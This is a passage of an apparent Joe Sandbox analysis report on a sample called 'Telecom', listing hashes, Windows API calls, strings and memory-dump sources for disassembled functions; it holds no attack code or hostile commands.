                                                      • Opcode ID: 497b13c68e86f07155dc5e5098594a0e120062626826a762cce7bc4a619dd254
                                                      • Instruction ID: 4d4101a05b6aa60119868ce20f9138930dae5dc63443a0617487512b30ab4856
                                                      • Opcode Fuzzy Hash: 497b13c68e86f07155dc5e5098594a0e120062626826a762cce7bc4a619dd254
                                                      • Instruction Fuzzy Hash: 1A912771504B06BFDB04CF24CA94BAAB7A9FF66304F00452FFA4682180EB39ED55CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenuItemInfoW.USER32(005129C0,000000FF,00000000,00000030), ref: 004AC973
                                                      • SetMenuItemInfoW.USER32(005129C0,00000004,00000000,00000030), ref: 004AC9A8
                                                      • Sleep.KERNEL32(000001F4), ref: 004AC9BA
                                                      • GetMenuItemCount.USER32(?), ref: 004ACA00
                                                      • GetMenuItemID.USER32(?,00000000), ref: 004ACA1D
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 004ACA49
                                                      • GetMenuItemID.USER32(?,?), ref: 004ACA90
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004ACAD6
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ACAEB
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ACB0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                      • String ID: 0
                                                      • API String ID: 1460738036-4108050209
                                                      • Opcode ID: 189a3900c9c0b58e0e57e1600cf0f45d0345016b0150c3d943afaee298a8d0f8
                                                      • Instruction ID: 6fff1d2074233d45443f3dd6ec490d49fa468c930381070ed14eeeb3c6b0a74f
                                                      • Opcode Fuzzy Hash: 189a3900c9c0b58e0e57e1600cf0f45d0345016b0150c3d943afaee298a8d0f8
                                                      • Instruction Fuzzy Hash: 2461BEB0901209AFDF51CF68DDC8AFF7BA8FB16348F04401AE812A3251D739AD05CB65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004AE4D4
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004AE4FA
                                                      • _wcslen.LIBCMT ref: 004AE504
                                                      • _wcsstr.LIBVCRUNTIME ref: 004AE554
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004AE570
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 1939486746-1459072770
                                                      • Opcode ID: 4d7f55a4c867b5846723ee6c15f7a618f713f6de53edacc8e413f5e5414c8d7d
                                                      • Instruction ID: ebe214f169b16676f3032c3bbb676dc7aa68fefc5e504f80a30e2eef3d86e5bf
                                                      • Opcode Fuzzy Hash: 4d7f55a4c867b5846723ee6c15f7a618f713f6de53edacc8e413f5e5414c8d7d
                                                      • Instruction Fuzzy Hash: C041FA729402047AEB10AB66DC47EBF776CDF66714F10046BF901A6182FB7D9A0192AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • timeGetTime.WINMM ref: 004AEFCB
                                                        • Part of subcall function 0045F215: timeGetTime.WINMM(?,?,004AEFEB), ref: 0045F219
                                                      • Sleep.KERNEL32(0000000A), ref: 004AEFF8
                                                      • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 004AF01C
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004AF03E
                                                      • SetActiveWindow.USER32 ref: 004AF05D
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004AF06B
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004AF08A
                                                      • Sleep.KERNEL32(000000FA), ref: 004AF095
                                                      • IsWindow.USER32 ref: 004AF0A1
                                                      • EndDialog.USER32(00000000), ref: 004AF0B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: c7578466c65bb36f67615f97fb096bad48659c9aba032ec323db715018a4356d
                                                      • Instruction ID: 61bc9a658e8e6c28135ef81e7b25499d02bd33acf7ab4d6629d14ccd91a2ab97
                                                      • Opcode Fuzzy Hash: c7578466c65bb36f67615f97fb096bad48659c9aba032ec323db715018a4356d
                                                      • Instruction Fuzzy Hash: F921A471A05204BFE7116F60EC99B677B69F77A749F00403BF50282372CB799C089669
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004AF374
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004AF38A
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004AF39B
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004AF3AD
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004AF3BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 77c20ba46cb9725ddc01c8f358dd30e5671d2e21c97ef3bc9048ecf1e9635a60
                                                      • Instruction ID: 3d8b8692e17c78360503894fd3aa6675d78424baf156f5228092a20455a53962
                                                      • Opcode Fuzzy Hash: 77c20ba46cb9725ddc01c8f358dd30e5671d2e21c97ef3bc9048ecf1e9635a60
                                                      • Instruction Fuzzy Hash: F811A771E9015D79E710A7A68C4AEFF6E7CEFE6B04F40082B7801E20D1DA646909C6B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _free.LIBCMT ref: 00473007
                                                        • Part of subcall function 00472D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4), ref: 00472D4E
                                                        • Part of subcall function 00472D38: GetLastError.KERNEL32(00511DC4,?,0047DB51,00511DC4,00000000,00511DC4,00000000,?,0047DB78,00511DC4,00000007,00511DC4,?,0047DF75,00511DC4,00511DC4), ref: 00472D60
                                                      • _free.LIBCMT ref: 00473013
                                                      • _free.LIBCMT ref: 0047301E
                                                      • _free.LIBCMT ref: 00473029
                                                      • _free.LIBCMT ref: 00473034
                                                      • _free.LIBCMT ref: 0047303F
                                                      • _free.LIBCMT ref: 0047304A
                                                      • _free.LIBCMT ref: 00473055
                                                      • _free.LIBCMT ref: 00473060
                                                      • _free.LIBCMT ref: 0047306E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID: &N
                                                      • API String ID: 776569668-3062594351
                                                      • Opcode ID: 01851801879984a5208ba90a59370964ad75af7871390c93ba5371f79c20bffc
                                                      • Instruction ID: c858d2efe409836f9baa71d1c94733aca348bc8ddee37c227deeeb17c99da276
                                                      • Opcode Fuzzy Hash: 01851801879984a5208ba90a59370964ad75af7871390c93ba5371f79c20bffc
                                                      • Instruction Fuzzy Hash: 3011E976100008FFCB11EF56CA42CDE3B65EF05354F8184AAFA0C9F222D679DE519B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 004AA9D9
                                                      • SetKeyboardState.USER32(?), ref: 004AAA44
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 004AAA64
                                                      • GetKeyState.USER32(000000A0), ref: 004AAA7B
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 004AAAAA
                                                      • GetKeyState.USER32(000000A1), ref: 004AAABB
                                                      • GetAsyncKeyState.USER32(00000011), ref: 004AAAE7
                                                      • GetKeyState.USER32(00000011), ref: 004AAAF5
                                                      • GetAsyncKeyState.USER32(00000012), ref: 004AAB1E
                                                      • GetKeyState.USER32(00000012), ref: 004AAB2C
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 004AAB55
                                                      • GetKeyState.USER32(0000005B), ref: 004AAB63
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: ec4013cbd3df7f28ccf2cd340b5b97752f8c9adb28046d1b51cba9a5dadb5e49
                                                      • Instruction ID: 7d8bd4e41fd5bee9857107e77d2771647ca9f866ce4389af6f1a70613155dbf3
                                                      • Opcode Fuzzy Hash: ec4013cbd3df7f28ccf2cd340b5b97752f8c9adb28046d1b51cba9a5dadb5e49
                                                      • Instruction Fuzzy Hash: 1B51B860A0478429FB35DB608954BABAFF59F23344F08459FC5C2572C2DB58AB4CC7AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 004A6649
                                                      • GetWindowRect.USER32(00000000,?), ref: 004A6662
                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004A66C0
                                                      • GetDlgItem.USER32(?,00000002), ref: 004A66D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 004A66E2
                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004A6736
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004A6744
                                                      • GetWindowRect.USER32(00000000,?), ref: 004A6756
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004A6798
                                                      • GetDlgItem.USER32(?,000003EA), ref: 004A67AB
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004A67C1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004A67CE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 71d11d19173092f8a886256f7c5f7d04793772a47dd2ced75e1fcc9423b386d0
                                                      • Instruction ID: 72f07972332c43d78ba05061e36f2ed814e6bdecc82fc4a75f04a4775f44127f
                                                      • Opcode Fuzzy Hash: 71d11d19173092f8a886256f7c5f7d04793772a47dd2ced75e1fcc9423b386d0
                                                      • Instruction Fuzzy Hash: BA514EB4F01205AFDB08CFA8CD89AAEBBB9FB58314F15812AF519E6290D7749D008B54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00442234: GetWindowLongW.USER32(?,000000EB), ref: 00442242
                                                      • GetSysColor.USER32(0000000F), ref: 00442152
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: d0b17eb91a95f2fdbcd1516666e4ba50bc67744980878719fe19d5bfc44f3877
                                                      • Instruction ID: df7988a92c033f1f308a5fa24a137d0d18966c995942a5683aaf43188a2365e2
                                                      • Opcode Fuzzy Hash: d0b17eb91a95f2fdbcd1516666e4ba50bc67744980878719fe19d5bfc44f3877
                                                      • Instruction Fuzzy Hash: 0E410331501640AFEB205F38DC44BBA3BA5EB06731F544657FAA2872E1C7B98D42DB19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004828D1
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004828EA
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004828FA
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00482912
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00482933
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00482942
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0048295F
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004411F5,00000000,00000000,00000000,000000FF,00000000), ref: 0048296E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID: (Q
                                                      • API String ID: 1268354404-2768264020
                                                      • Opcode ID: f07bd4a234e7a2b5265628f14662cba2d5d4d32c81bb45d5d2462a89ebd587aa
                                                      • Instruction ID: 803b7733d616bf0b12b01456d766a2ff9061fe1cc06c4272514ec82dca32a01b
                                                      • Opcode Fuzzy Hash: f07bd4a234e7a2b5265628f14662cba2d5d4d32c81bb45d5d2462a89ebd587aa
                                                      • Instruction Fuzzy Hash: 38519D70A00309AFEB20DF25CD45BAA7BB5FF48314F10452AF942972A0D7B4ED91DB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004424B0
                                                        • Part of subcall function 004419CD: GetCursorPos.USER32(?), ref: 004419E1
                                                        • Part of subcall function 004419CD: ScreenToClient.USER32(00000000,?), ref: 004419FE
                                                        • Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000001), ref: 00441A23
                                                        • Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000002), ref: 00441A3D
                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 004D95C7
                                                      • ImageList_EndDrag.COMCTL32 ref: 004D95CD
                                                      • ReleaseCapture.USER32 ref: 004D95D3
                                                      • SetWindowTextW.USER32(?,00000000), ref: 004D966E
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004D9681
                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 004D975B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$(Q$(Q
                                                      • API String ID: 1924731296-1218897950
                                                      • Opcode ID: 801360fbdac1b03afafa54459f4236a1dde899bd7d160f4c80476e57dab26aff
                                                      • Instruction ID: d086b1a5d15b2dcf46f6d41c2257fb6fc11d191d8efec44e47f84823cfd4de73
                                                      • Opcode Fuzzy Hash: 801360fbdac1b03afafa54459f4236a1dde899bd7d160f4c80476e57dab26aff
                                                      • Instruction Fuzzy Hash: E4519D70604300AFE704EF25CC66FAA77E4FB84718F40062EF995962E1CB749D48DB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00490D31,00000001,0000138C,00000001,00000002,00000001,?,004BEEAE,00512430), ref: 004AA091
                                                      • LoadStringW.USER32(00000000,?,00490D31,00000001), ref: 004AA09A
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00490D31,00000001,0000138C,00000001,00000002,00000001,?,004BEEAE,00512430,?), ref: 004AA0BC
                                                      • LoadStringW.USER32(00000000,?,00490D31,00000001), ref: 004AA0BF
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004AA1E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: 81ee70679b1003752552ea136a9da0a324360029018c41d0d1a5d892c4f8ac76
                                                      • Instruction ID: bad48b7de1b00a09613bafb2dbdeefd1231a7ffb762c3117b51297341ea77be4
                                                      • Opcode Fuzzy Hash: 81ee70679b1003752552ea136a9da0a324360029018c41d0d1a5d892c4f8ac76
                                                      • Instruction Fuzzy Hash: 13415272800119AADF05EBE1DD46DEEB778EF19308F10006AB501B2092DB796F59CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004A1093
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004A10AF
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004A10CB
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004A10F5
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 004A111D
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004A1128
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004A112D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: 85e57d875d07d4480611cd5cbd62d650e18863be11f10f376557150cddde7557
                                                      • Instruction ID: 0c42da070a164fe450cc72667e8af6ac550e69beb21c5dce4ddc33e94f6a4790
                                                      • Opcode Fuzzy Hash: 85e57d875d07d4480611cd5cbd62d650e18863be11f10f376557150cddde7557
                                                      • Instruction Fuzzy Hash: 64410A72C10229ABDF11EFA5DC45DEEB7B8FF18754F00406AE901A7160EB359E04CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004D4AD9
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 004D4AE0
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004D4AF3
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004D4AFB
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 004D4B06
                                                      • DeleteDC.GDI32(00000000), ref: 004D4B10
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004D4B1A
                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 004D4B30
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 004D4B3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 740fca3751b35bc7938b121b7bc34988e292e79e034c8d9140607233b8a30750
